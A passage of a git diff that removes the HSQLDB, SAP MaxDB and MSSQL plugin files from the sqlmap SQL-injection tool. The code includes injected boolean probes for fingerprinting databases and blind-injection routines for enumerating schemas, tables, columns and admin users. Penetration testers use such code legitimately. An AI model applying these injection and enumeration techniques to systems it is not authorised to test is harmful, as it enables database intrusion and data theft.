jpype.getDefaultJVMPath() - jpype.startJVM(jvm_path, args) - except Exception, msg: - raise SqlmapConnectionException(msg[0]) - - try: - driver = 'org.hsqldb.jdbc.JDBCDriver' - connection_string = 'jdbc:hsqldb:mem:.' #'jdbc:hsqldb:hsql://%s/%s' % (self.hostname, self.db) - self.connector = jaydebeapi.connect(driver, - connection_string, - str(self.user), - str(self.password)) - except Exception, msg: - raise SqlmapConnectionException(msg[0]) - - self.initCursor() - self.printConnected() - - def fetchall(self): - try: - return self.cursor.fetchall() - except Exception, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) - return None - - def execute(self, query): - retVal = False - - try: - self.cursor.execute(query) - retVal = True - except Exception, msg: #todo fix with specific error - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) - - self.connector.commit() - - return retVal - - def select(self, query): - retVal = None - - upper_query = query.upper() - - if query and not (upper_query.startswith("SELECT ") or upper_query.startswith("VALUES ")): - query = "VALUES %s" % query - - if query and upper_query.startswith("SELECT ") and " FROM " not in upper_query: - query = "%s FROM (VALUES(0))" % query - - self.cursor.execute(query) - retVal = self.cursor.fetchall() - - return retVal diff --git a/plugins/dbms/hsqldb/enumeration.py b/plugins/dbms/hsqldb/enumeration.py deleted file mode 100644 index 86977408..00000000 --- a/plugins/dbms/hsqldb/enumeration.py +++ /dev/null @@ -1,46 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from plugins.generic.enumeration import Enumeration as GenericEnumeration -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.data import queries -from lib.core.common import Backend -from lib.core.common import unArrayizeValue -from lib.core.settings import HSQLDB_DEFAULT_SCHEMA -from lib.request import inject - -class Enumeration(GenericEnumeration): - def __init__(self): - GenericEnumeration.__init__(self) - - def getBanner(self): - if not conf.getBanner: - return - - if kb.data.banner is None: - infoMsg = "fetching banner" - logger.info(infoMsg) - - query = queries[Backend.getIdentifiedDbms()].banner.query - kb.data.banner = unArrayizeValue(inject.getValue(query, safeCharEncode=True)) - - return kb.data.banner - - def getPrivileges(self, *args): - warnMsg = "on HSQLDB it is not possible to enumerate the user privileges" - logger.warn(warnMsg) - - return {} - - def getHostname(self): - warnMsg = "on HSQLDB it is not possible to enumerate the hostname" - logger.warn(warnMsg) - - def getCurrentDb(self): - return HSQLDB_DEFAULT_SCHEMA diff --git a/plugins/dbms/hsqldb/filesystem.py b/plugins/dbms/hsqldb/filesystem.py deleted file mode 100644 index e3dedad9..00000000 --- a/plugins/dbms/hsqldb/filesystem.py +++ /dev/null @@ -1,21 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.exception import SqlmapUnsupportedFeatureException -from plugins.generic.filesystem import Filesystem as GenericFilesystem - -class Filesystem(GenericFilesystem): - def __init__(self): - GenericFilesystem.__init__(self) - - def readFile(self, rFile): - errMsg = "on HSQLDB it is not possible to read files" - raise SqlmapUnsupportedFeatureException(errMsg) - - def writeFile(self, wFile, dFile, fileType=None, forceCheck=False): - errMsg = "on HSQLDB it is not possible to read files" - raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/hsqldb/fingerprint.py b/plugins/dbms/hsqldb/fingerprint.py deleted file mode 100644 index 4198d299..00000000 --- a/plugins/dbms/hsqldb/fingerprint.py +++ /dev/null @@ -1,144 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re - -from lib.core.common import Backend -from lib.core.common import Format -from lib.core.common import unArrayizeValue -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.enums import DBMS -from lib.core.session import setDbms -from lib.core.settings import HSQLDB_ALIASES -from lib.core.settings import UNKNOWN_DBMS_VERSION -from lib.request import inject -from plugins.generic.fingerprint import Fingerprint as GenericFingerprint - -class Fingerprint(GenericFingerprint): - def __init__(self): - GenericFingerprint.__init__(self, DBMS.HSQLDB) - - def getFingerprint(self): - value = "" - wsOsFp = Format.getOs("web server", kb.headersFp) - - if wsOsFp and not hasattr(conf, "api"): - value += "%s\n" % wsOsFp - - if kb.data.banner: - dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) - - if dbmsOsFp and not hasattr(conf, "api"): - value += "%s\n" % dbmsOsFp - - value += "back-end DBMS: " - actVer = Format.getDbms() - - if not conf.extensiveFp: - value += actVer - return value - - blank = " " * 15 - value += "active fingerprint: %s" % actVer - - if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None - - if re.search("-log$", kb.data.banner): - banVer += ", logging enabled" - - banVer = Format.getDbms([banVer] if banVer else None) - value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) - - htmlErrorFp = Format.getErrorParsedDBMSes() - - if htmlErrorFp: - value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) - - return value - - def checkDbms(self): - """ - References for fingerprint: - DATABASE_VERSION() - version 2.2.6 added two-arg REPLACE functio REPLACE('a','a') compared to REPLACE('a','a','d') - version 2.2.5 added SYSTIMESTAMP function - version 2.2.3 added REGEXPR_SUBSTRING and REGEXPR_SUBSTRING_ARRAY functions - version 2.2.0 added support for ROWNUM() function - version 2.1.0 added MEDIAN aggregate function - version < 2.0.1 added support for datetime ROUND and TRUNC functions - version 2.0.0 added VALUES support - version 1.8.0.4 Added org.hsqldbdb.Library function, getDatabaseFullProductVersion to return the - full version string, including the 4th digit (e.g 1.8.0.4). - version 1.7.2 CASE statements added and INFORMATION_SCHEMA - - """ - - if not conf.extensiveFp and (Backend.isDbmsWithin(HSQLDB_ALIASES) \ - or (conf.dbms or "").lower() in HSQLDB_ALIASES) and Backend.getVersion() and \ - Backend.getVersion() != UNKNOWN_DBMS_VERSION: - v = Backend.getVersion().replace(">", "") - v = v.replace("=", "") - v = v.replace(" ", "") - - Backend.setVersion(v) - - setDbms("%s %s" % (DBMS.HSQLDB, Backend.getVersion())) - - if Backend.isVersionGreaterOrEqualThan("1.7.2"): - kb.data.has_information_schema = True - - self.getBanner() - - return True - - infoMsg = "testing %s" % DBMS.HSQLDB - logger.info(infoMsg) - - result = inject.checkBooleanExpression("CASEWHEN(1=1,1,0)=1") - - if result: - infoMsg = "confirming %s" % DBMS.HSQLDB - logger.info(infoMsg) - - result = inject.checkBooleanExpression("ROUNDMAGIC(PI())>=3") - - if not result: - warnMsg = "the back-end DBMS is not %s" % DBMS.HSQLDB - logger.warn(warnMsg) - - return False - else: - kb.data.has_information_schema = True - Backend.setVersion(">= 1.7.2") - setDbms("%s 1.7.2" % DBMS.HSQLDB) - - banner = self.getBanner() - if banner: - Backend.setVersion("= %s" % banner) - else: - if inject.checkBooleanExpression("(SELECT [RANDNUM] FROM (VALUES(0)))=[RANDNUM]"): - Backend.setVersionList([">= 2.0.0", "< 2.3.0"]) - else: - banner = unArrayizeValue(inject.getValue("\"org.hsqldbdb.Library.getDatabaseFullProductVersion\"()", safeCharEncode=True)) - if banner: - Backend.setVersion("= %s" % banner) - else: - Backend.setVersionList([">= 1.7.2", "< 1.8.0"]) - - return True - else: - warnMsg = "the back-end DBMS is not %s or version is < 1.7.2" % DBMS.HSQLDB - logger.warn(warnMsg) - - return False - - def getHostname(self): - warnMsg = "on HSQLDB it is not possible to enumerate the hostname" - logger.warn(warnMsg) diff --git a/plugins/dbms/hsqldb/syntax.py b/plugins/dbms/hsqldb/syntax.py deleted file mode 100644 index 0b8864be..00000000 --- a/plugins/dbms/hsqldb/syntax.py +++ /dev/null @@ -1,24 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from plugins.generic.syntax import Syntax as GenericSyntax - -class Syntax(GenericSyntax): - def __init__(self): - GenericSyntax.__init__(self) - - @staticmethod - def escape(expression, quote=True): - """ - >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") - 'SELECT CHAR(97)||CHAR(98)||CHAR(99)||CHAR(100)||CHAR(101)||CHAR(102)||CHAR(103)||CHAR(104) FROM foobar' - """ - - def escaper(value): - return "||".join("CHAR(%d)" % ord(value[i]) for i in xrange(len(value))) - - return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/hsqldb/takeover.py b/plugins/dbms/hsqldb/takeover.py deleted file mode 100644 index ad241da0..00000000 --- a/plugins/dbms/hsqldb/takeover.py +++ /dev/null @@ -1,31 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.exception import SqlmapUnsupportedFeatureException -from plugins.generic.takeover import Takeover as GenericTakeover - -class Takeover(GenericTakeover): - def __init__(self): - GenericTakeover.__init__(self) - - def osCmd(self): - errMsg = "on HSQLDB it is not possible to execute commands" - raise SqlmapUnsupportedFeatureException(errMsg) - - def osShell(self): - errMsg = "on HSQLDB it is not possible to execute commands" - raise SqlmapUnsupportedFeatureException(errMsg) - - def osPwn(self): - errMsg = "on HSQLDB it is not possible to establish an " - errMsg += "out-of-band connection" - raise SqlmapUnsupportedFeatureException(errMsg) - - def osSmb(self): - errMsg = "on HSQLDB it is not possible to establish an " - errMsg += "out-of-band connection" - raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/maxdb/__init__.py b/plugins/dbms/maxdb/__init__.py deleted file mode 100644 index dca58056..00000000 --- a/plugins/dbms/maxdb/__init__.py +++ /dev/null @@ -1,33 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import DBMS -from lib.core.settings import MAXDB_SYSTEM_DBS -from lib.core.unescaper import unescaper -from plugins.dbms.maxdb.enumeration import Enumeration -from plugins.dbms.maxdb.filesystem import Filesystem -from plugins.dbms.maxdb.fingerprint import Fingerprint -from plugins.dbms.maxdb.syntax import Syntax -from plugins.dbms.maxdb.takeover import Takeover -from plugins.generic.misc import Miscellaneous - -class MaxDBMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): - """ - This class defines SAP MaxDB methods - """ - - def __init__(self): - self.excludeDbsList = MAXDB_SYSTEM_DBS - - Syntax.__init__(self) - Fingerprint.__init__(self) - Enumeration.__init__(self) - Filesystem.__init__(self) - Miscellaneous.__init__(self) - Takeover.__init__(self) - - unescaper[DBMS.MAXDB] = Syntax.escape diff --git a/plugins/dbms/maxdb/connector.py b/plugins/dbms/maxdb/connector.py deleted file mode 100644 index 06aef635..00000000 --- a/plugins/dbms/maxdb/connector.py +++ /dev/null @@ -1,18 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.exception import SqlmapUnsupportedFeatureException -from plugins.generic.connector import Connector as GenericConnector - -class Connector(GenericConnector): - def __init__(self): - GenericConnector.__init__(self) - - def connect(self): - errMsg = "on SAP MaxDB it is not possible to establish a " - errMsg += "direct connection" - raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/maxdb/enumeration.py b/plugins/dbms/maxdb/enumeration.py deleted file mode 100644 index 1c339963..00000000 --- a/plugins/dbms/maxdb/enumeration.py +++ /dev/null @@ -1,237 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.common import Backend -from lib.core.common import randomStr -from lib.core.common import readInput -from lib.core.common import safeSQLIdentificatorNaming -from lib.core.common import unsafeSQLIdentificatorNaming -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.data import paths -from lib.core.data import queries -from lib.core.exception import SqlmapMissingMandatoryOptionException -from lib.core.exception import SqlmapNoneDataException -from lib.core.exception import SqlmapUserQuitException -from lib.core.settings import CURRENT_DB -from lib.utils.pivotdumptable import pivotDumpTable -from lib.techniques.brute.use import columnExists -from plugins.generic.enumeration import Enumeration as GenericEnumeration - -class Enumeration(GenericEnumeration): - def __init__(self): - GenericEnumeration.__init__(self) - - kb.data.processChar = lambda x: x.replace('_', ' ') if x else x - - def getPasswordHashes(self): - warnMsg = "on SAP MaxDB it is not possible to enumerate the user password hashes" - logger.warn(warnMsg) - - return {} - - def getDbs(self): - if len(kb.data.cachedDbs) > 0: - return kb.data.cachedDbs - - infoMsg = "fetching database names" - logger.info(infoMsg) - - rootQuery = queries[Backend.getIdentifiedDbms()].dbs - randStr = randomStr() - query = rootQuery.inband.query - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.schemaname' % randStr], blind=True) - - if retVal: - kb.data.cachedDbs = retVal[0].values()[0] - - if kb.data.cachedDbs: - kb.data.cachedDbs.sort() - - return kb.data.cachedDbs - - def getTables(self, bruteForce=None): - if len(kb.data.cachedTables) > 0: - return kb.data.cachedTables - - self.forceDbmsEnum() - - if conf.db == CURRENT_DB: - conf.db = self.getCurrentDb() - - if conf.db: - dbs = conf.db.split(",") - else: - dbs = self.getDbs() - - for db in filter(None, dbs): - dbs[dbs.index(db)] = safeSQLIdentificatorNaming(db) - - infoMsg = "fetching tables for database" - infoMsg += "%s: %s" % ("s" if len(dbs) > 1 else "", ", ".join(db if isinstance(db, basestring) else db[0] for db in sorted(dbs))) - logger.info(infoMsg) - - rootQuery = queries[Backend.getIdentifiedDbms()].tables - - for db in dbs: - randStr = randomStr() - query = rootQuery.inband.query % (("'%s'" % db) if db != "USER" else 'USER') - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.tablename' % randStr], blind=True) - - if retVal: - for table in retVal[0].values()[0]: - if db not in kb.data.cachedTables: - kb.data.cachedTables[db] = [table] - else: - kb.data.cachedTables[db].append(table) - - for db, tables in kb.data.cachedTables.items(): - kb.data.cachedTables[db] = sorted(tables) if tables else tables - - return kb.data.cachedTables - - def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMode=False): - self.forceDbmsEnum() - - if conf.db is None or conf.db == CURRENT_DB: - if conf.db is None: - warnMsg = "missing database parameter. sqlmap is going " - warnMsg += "to use the current database to enumerate " - warnMsg += "table(s) columns" - logger.warn(warnMsg) - - conf.db = self.getCurrentDb() - - elif conf.db is not None: - if ',' in conf.db: - errMsg = "only one database name is allowed when enumerating " - errMsg += "the tables' columns" - raise SqlmapMissingMandatoryOptionException(errMsg) - - conf.db = safeSQLIdentificatorNaming(conf.db) - - if conf.col: - colList = conf.col.split(",") - else: - colList = [] - - if conf.excludeCol: - colList = [_ for _ in colList if _ not in conf.excludeCol.split(',')] - - for col in colList: - colList[colList.index(col)] = safeSQLIdentificatorNaming(col) - - if conf.tbl: - tblList = conf.tbl.split(",") - else: - self.getTables() - - if len(kb.data.cachedTables) > 0: - tblList = kb.data.cachedTables.values() - - if isinstance(tblList[0], (set, tuple, list)): - tblList = tblList[0] - else: - errMsg = "unable to retrieve the tables " - errMsg += "on database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - raise SqlmapNoneDataException(errMsg) - - for tbl in tblList: - tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True) - - if bruteForce: - resumeAvailable = False - - for tbl in tblList: - for db, table, colName, colType in kb.brute.columns: - if db == conf.db and table == tbl: - resumeAvailable = True - break - - if resumeAvailable and not conf.freshQueries or colList: - columns = {} - - for column in colList: - columns[column] = None - - for tbl in tblList: - for db, table, colName, colType in kb.brute.columns: - if db == conf.db and table == tbl: - columns[colName] = colType - - if conf.db in kb.data.cachedColumns: - kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)] = columns - else: - kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = {safeSQLIdentificatorNaming(tbl, True): columns} - - return kb.data.cachedColumns - - message = "do you want to use common column existence check? [y/N/q] " - test = readInput(message, default="Y" if "Y" in message else "N") - - if test[0] in ("n", "N"): - return - elif test[0] in ("q", "Q"): - raise SqlmapUserQuitException - else: - return columnExists(paths.COMMON_COLUMNS) - - rootQuery = queries[Backend.getIdentifiedDbms()].columns - - for tbl in tblList: - if conf.db is not None and len(kb.data.cachedColumns) > 0 \ - and conf.db in kb.data.cachedColumns and tbl in \ - kb.data.cachedColumns[conf.db]: - infoMsg = "fetched tables' columns on " - infoMsg += "database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - logger.info(infoMsg) - - return {conf.db: kb.data.cachedColumns[conf.db]} - - if dumpMode and colList: - table = {} - table[safeSQLIdentificatorNaming(tbl)] = dict((_, None) for _ in colList) - kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = table - continue - - infoMsg = "fetching columns " - infoMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) - infoMsg += "on database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - logger.info(infoMsg) - - randStr = randomStr() - query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl), ("'%s'" % unsafeSQLIdentificatorNaming(conf.db)) if unsafeSQLIdentificatorNaming(conf.db) != "USER" else 'USER') - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.columnname' % randStr, '%s.datatype' % randStr, '%s.len' % randStr], blind=True) - - if retVal: - table = {} - columns = {} - - for columnname, datatype, length in zip(retVal[0]["%s.columnname" % randStr], retVal[0]["%s.datatype" % randStr], retVal[0]["%s.len" % randStr]): - columns[safeSQLIdentificatorNaming(columnname)] = "%s(%s)" % (datatype, length) - - table[tbl] = columns - kb.data.cachedColumns[conf.db] = table - - return kb.data.cachedColumns - - def getPrivileges(self, *args): - warnMsg = "on SAP MaxDB it is not possible to enumerate the user privileges" - logger.warn(warnMsg) - - return {} - - def searchDb(self): - warnMsg = "on SAP MaxDB it is not possible to search databases" - logger.warn(warnMsg) - - return [] - - def getHostname(self): - warnMsg = "on SAP MaxDB it is not possible to enumerate the hostname" - logger.warn(warnMsg) diff --git a/plugins/dbms/maxdb/filesystem.py b/plugins/dbms/maxdb/filesystem.py deleted file mode 100644 index 27f543b2..00000000 --- a/plugins/dbms/maxdb/filesystem.py +++ /dev/null @@ -1,21 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.exception import SqlmapUnsupportedFeatureException -from plugins.generic.filesystem import Filesystem as GenericFilesystem - -class Filesystem(GenericFilesystem): - def __init__(self): - GenericFilesystem.__init__(self) - - def readFile(self, rFile): - errMsg = "on SAP MaxDB reading of files is not supported" - raise SqlmapUnsupportedFeatureException(errMsg) - - def writeFile(self, wFile, dFile, fileType=None, forceCheck=False): - errMsg = "on SAP MaxDB writing of files is not supported" - raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/maxdb/fingerprint.py b/plugins/dbms/maxdb/fingerprint.py deleted file mode 100644 index 457f95e8..00000000 --- a/plugins/dbms/maxdb/fingerprint.py +++ /dev/null @@ -1,136 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.agent import agent -from lib.core.common import Backend -from lib.core.common import Format -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.enums import DBMS -from lib.core.session import setDbms -from lib.core.settings import MAXDB_ALIASES -from lib.request import inject -from lib.request.connect import Connect as Request -from plugins.generic.fingerprint import Fingerprint as GenericFingerprint - -class Fingerprint(GenericFingerprint): - def __init__(self): - GenericFingerprint.__init__(self, DBMS.MAXDB) - - def _versionCheck(self): - infoMsg = "executing %s SYSINFO version check" % DBMS.MAXDB - logger.info(infoMsg) - - query = agent.prefixQuery("/* NoValue */") - query = agent.suffixQuery(query) - payload = agent.payload(newValue=query) - result = Request.queryPage(payload) - - if not result: - warnMsg = "unable to perform %s version check" % DBMS.MAXDB - logger.warn(warnMsg) - - return None - - minor, major = None, None - - for version in (6, 7): - result = inject.checkBooleanExpression("%d=(SELECT MAJORVERSION FROM SYSINFO.VERSION)" % version) - - if result: - major = version - - for version in xrange(0, 10): - result = inject.checkBooleanExpression("%d=(SELECT MINORVERSION FROM SYSINFO.VERSION)" % version) - - if result: - minor = version - - if major and minor: - return "%s.%s" % (major, minor) - else: - return None - - def getFingerprint(self): - value = "" - wsOsFp = Format.getOs("web server", kb.headersFp) - - if wsOsFp: - value += "%s\n" % wsOsFp - - if kb.data.banner: - dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) - - if dbmsOsFp: - value += "%s\n" % dbmsOsFp - - blank = " " * 15 - value += "back-end DBMS: " - - if not conf.extensiveFp: - value += DBMS.MAXDB - return value - - actVer = Format.getDbms() + " (%s)" % self._versionCheck() - blank = " " * 15 - value += "active fingerprint: %s" % actVer - - if kb.bannerFp: - value += "\n%sbanner parsing fingerprint: -" % blank - - htmlErrorFp = Format.getErrorParsedDBMSes() - - if htmlErrorFp: - value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) - - return value - - def checkDbms(self): - if not conf.extensiveFp and (Backend.isDbmsWithin(MAXDB_ALIASES) or (conf.dbms or "").lower() in MAXDB_ALIASES): - setDbms(DBMS.MAXDB) - - self.getBanner() - - return True - - infoMsg = "testing %s" % DBMS.MAXDB - logger.info(infoMsg) - - result = inject.checkBooleanExpression("ALPHA(NULL) IS NULL") - - if result: - infoMsg = "confirming %s" % DBMS.MAXDB - logger.info(infoMsg) - - result = inject.checkBooleanExpression("MAPCHAR(NULL,1,DEFAULTMAP) IS NULL") - - if not result: - warnMsg = "the back-end DBMS is not %s" % DBMS.MAXDB - logger.warn(warnMsg) - - return False - - setDbms(DBMS.MAXDB) - - self.getBanner() - - return True - else: - warnMsg = "the back-end DBMS is not %s" % DBMS.MAXDB - logger.warn(warnMsg) - - return False - - def forceDbmsEnum(self): - if conf.db: - conf.db = conf.db.upper() - else: - conf.db = "USER" - - if conf.tbl: - conf.tbl = conf.tbl.upper() diff --git a/plugins/dbms/maxdb/syntax.py b/plugins/dbms/maxdb/syntax.py deleted file mode 100644 index e5a5351a..00000000 --- a/plugins/dbms/maxdb/syntax.py +++ /dev/null @@ -1,21 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from plugins.generic.syntax import Syntax as GenericSyntax - -class Syntax(GenericSyntax): - def __init__(self): - GenericSyntax.__init__(self) - - @staticmethod - def escape(expression, quote=True): - """ - >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") - "SELECT 'abcdefgh' FROM foobar" - """ - - return expression diff --git a/plugins/dbms/maxdb/takeover.py b/plugins/dbms/maxdb/takeover.py deleted file mode 100644 index 46cbcf16..00000000 --- a/plugins/dbms/maxdb/takeover.py +++ /dev/null @@ -1,31 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.exception import SqlmapUnsupportedFeatureException -from plugins.generic.takeover import Takeover as GenericTakeover - -class Takeover(GenericTakeover): - def __init__(self): - GenericTakeover.__init__(self) - - def osCmd(self): - errMsg = "on SAP MaxDB it is not possible to execute commands" - raise SqlmapUnsupportedFeatureException(errMsg) - - def osShell(self): - errMsg = "on SAP MaxDB it is not possible to execute commands" - raise SqlmapUnsupportedFeatureException(errMsg) - - def osPwn(self): - errMsg = "on SAP MaxDB it is not possible to establish an " - errMsg += "out-of-band connection" - raise SqlmapUnsupportedFeatureException(errMsg) - - def osSmb(self): - errMsg = "on SAP MaxDB it is not possible to establish an " - errMsg += "out-of-band connection" - raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/mssqlserver/__init__.py b/plugins/dbms/mssqlserver/__init__.py deleted file mode 100644 index 948a8193..00000000 --- a/plugins/dbms/mssqlserver/__init__.py +++ /dev/null @@ -1,34 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import DBMS -from lib.core.settings import MSSQL_SYSTEM_DBS -from lib.core.unescaper import unescaper -from plugins.dbms.mssqlserver.enumeration import Enumeration -from plugins.dbms.mssqlserver.filesystem import Filesystem -from plugins.dbms.mssqlserver.fingerprint import Fingerprint -from plugins.dbms.mssqlserver.syntax import Syntax -from plugins.dbms.mssqlserver.takeover import Takeover -from plugins.generic.misc import Miscellaneous - - -class MSSQLServerMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): - """ - This class defines Microsoft SQL Server methods - """ - - def __init__(self): - self.excludeDbsList = MSSQL_SYSTEM_DBS - - Syntax.__init__(self) - Fingerprint.__init__(self) - Enumeration.__init__(self) - Filesystem.__init__(self) - Miscellaneous.__init__(self) - Takeover.__init__(self) - - unescaper[DBMS.MSSQL] = Syntax.escape diff --git a/plugins/dbms/mssqlserver/connector.py b/plugins/dbms/mssqlserver/connector.py deleted file mode 100644 index 89e8847e..00000000 --- a/plugins/dbms/mssqlserver/connector.py +++ /dev/null @@ -1,81 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -try: - import _mssql - import pymssql -except ImportError: - pass - -import logging - -from lib.core.convert import utf8encode -from lib.core.data import conf -from lib.core.data import logger -from lib.core.exception import SqlmapConnectionException -from plugins.generic.connector import Connector as GenericConnector - -class Connector(GenericConnector): - """ - Homepage: http://pymssql.sourceforge.net/ - User guide: http://pymssql.sourceforge.net/examples_pymssql.php - API: http://pymssql.sourceforge.net/ref_pymssql.php - Debian package: python-pymssql - License: LGPL - - Possible connectors: http://wiki.python.org/moin/SQL%20Server - - Important note: pymssql library on your system MUST be version 1.0.2 - to work, get it from http://sourceforge.net/projects/pymssql/files/pymssql/1.0.2/ - """ - - def __init__(self): - GenericConnector.__init__(self) - - def connect(self): - self.initConnection() - - try: - self.connector = pymssql.connect(host="%s:%d" % (self.hostname, self.port), user=self.user, password=self.password, database=self.db, login_timeout=conf.timeout, timeout=conf.timeout) - except (pymssql.ProgrammingError, pymssql.OperationalError, _mssql.MssqlDatabaseException), msg: - raise SqlmapConnectionException(msg) - - self.initCursor() - self.printConnected() - - def fetchall(self): - try: - return self.cursor.fetchall() - except (pymssql.ProgrammingError, pymssql.OperationalError, _mssql.MssqlDatabaseException), msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % str(msg).replace("\n", " ")) - return None - - def execute(self, query): - retVal = False - - try: - self.cursor.execute(utf8encode(query)) - retVal = True - except (pymssql.OperationalError, pymssql.ProgrammingError), msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % str(msg).replace("\n", " ")) - except pymssql.InternalError, msg: - raise SqlmapConnectionException(msg) - - return retVal - - def select(self, query): - retVal = None - - if self.execute(query): - retVal = self.fetchall() - - try: - self.connector.commit() - except pymssql.OperationalError: - pass - - return retVal diff --git a/plugins/dbms/mssqlserver/enumeration.py b/plugins/dbms/mssqlserver/enumeration.py deleted file mode 100644 index cd1a13b3..00000000 --- a/plugins/dbms/mssqlserver/enumeration.py +++ /dev/null @@ -1,422 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.agent import agent -from lib.core.common import arrayizeValue -from lib.core.common import Backend -from lib.core.common import getLimitRange -from lib.core.common import isInferenceAvailable -from lib.core.common import isNoneValue -from lib.core.common import isNumPosStrValue -from lib.core.common import isTechniqueAvailable -from lib.core.common import safeSQLIdentificatorNaming -from lib.core.common import safeStringFormat -from lib.core.common import unArrayizeValue -from lib.core.common import unsafeSQLIdentificatorNaming -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.data import queries -from lib.core.enums import CHARSET_TYPE -from lib.core.enums import EXPECTED -from lib.core.enums import PAYLOAD -from lib.core.exception import SqlmapNoneDataException -from lib.core.settings import CURRENT_DB -from lib.request import inject - -from plugins.generic.enumeration import Enumeration as GenericEnumeration - -class Enumeration(GenericEnumeration): - def __init__(self): - GenericEnumeration.__init__(self) - - def getPrivileges(self, *args): - warnMsg = "on Microsoft SQL Server it is not possible to fetch " - warnMsg += "database users privileges, sqlmap will check whether " - warnMsg += "or not the database users are database administrators" - logger.warn(warnMsg) - - users = [] - areAdmins = set() - - if conf.user: - users = [conf.user] - elif not len(kb.data.cachedUsers): - users = self.getUsers() - else: - users = kb.data.cachedUsers - - for user in users: - user = unArrayizeValue(user) - - if user is None: - continue - - isDba = self.isDba(user) - - if isDba is True: - areAdmins.add(user) - - kb.data.cachedUsersPrivileges[user] = None - - return (kb.data.cachedUsersPrivileges, areAdmins) - - def getTables(self): - if len(kb.data.cachedTables) > 0: - return kb.data.cachedTables - - self.forceDbmsEnum() - - if conf.db == CURRENT_DB: - conf.db = self.getCurrentDb() - - if conf.db: - dbs = conf.db.split(",") - else: - dbs = self.getDbs() - - for db in dbs: - dbs[dbs.index(db)] = safeSQLIdentificatorNaming(db) - - dbs = filter(None, dbs) - - infoMsg = "fetching tables for database" - infoMsg += "%s: %s" % ("s" 